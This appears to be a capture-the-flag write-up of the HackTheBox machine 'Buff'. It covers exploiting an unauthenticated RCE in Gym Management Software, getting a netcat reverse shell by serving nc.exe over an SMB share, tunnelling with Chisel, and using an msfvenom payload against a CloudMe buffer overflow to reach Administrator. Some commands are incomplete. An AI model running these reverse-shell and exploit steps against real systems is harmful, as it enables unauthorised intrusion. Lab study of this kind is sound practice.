We have a TTL of 127, which means it's likely a Windows machine.
First 1000 TCP ports
Web Server on port 8080
After enumerating every page on the website
We found this framework : "Gym Management Software 1.0" in the contact.php page After some Googling, turns out it's vulnerable to an unauthenticated RCE
Using the PoC from exploit DB we could get a remote shell
after getting this non interactive shell, we have to transfer nc.exe in order to get a fully interactive shell, we use an smb share to get that done.
## On attacker host
mkdir /tmp/smbshare/
cp nc.exe /tmp/smbshare/
sudo impacket-smbserver share -smb2support /tmp/smbshare/
## On Windows victim machine
copy \\$IP\share\nc.exe
After successfully copying the file, we can open a netcat listener and get a shell
#### On attacker host
nc -lvnp $PORT
#### On Windows victim
.\nc.exe $IP $PORT -e cmd.Exe
User Flag
Root Flag
Enumerating every folder in shaun's home directory, i found this :
Which is a file storage service that offers cloud storage, file synchronization and client software.
After some googling, turns out there's a buffer overflow vulnerability in this version 1.11.2
the PoC available for this exploit use Python, which is not installed on the victim windows machine, let's try and redirect the service back to our attacker machine Figuring out which prt it's using, i used netstat
It's using port 8888 (3306 is MySQL) We could use SSH if we had credentials to shaun, but unfortunately we don't
ssh -L 8888: shaun@buff.htb
Instead let's use a tool called Chisel to create a tunnel Just like before, we need to transfer the executable to the windows machine, we'll use the same smb share as before
./chisel server -p 8000 --reverse
#### On VICTIM
.\chisel.exe client R:8888:localhost:8888
After reading about the exploit, it's a buffer overflow, but we need to put in out own payload instead of the one in the PoC found on exploit DB Let's generate a payload using MSFVenom, a reverse tcp shell on port 1338
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 1338 -e powershell' -b '\x00\x0A\x0D' -f python
#### Note: Given the four-byte addresses and
#### references to ESP and EIP (as opposed to RSP
#### and RIP), this is a 32-bit program.
Upon executing the script, we get a session as Administrator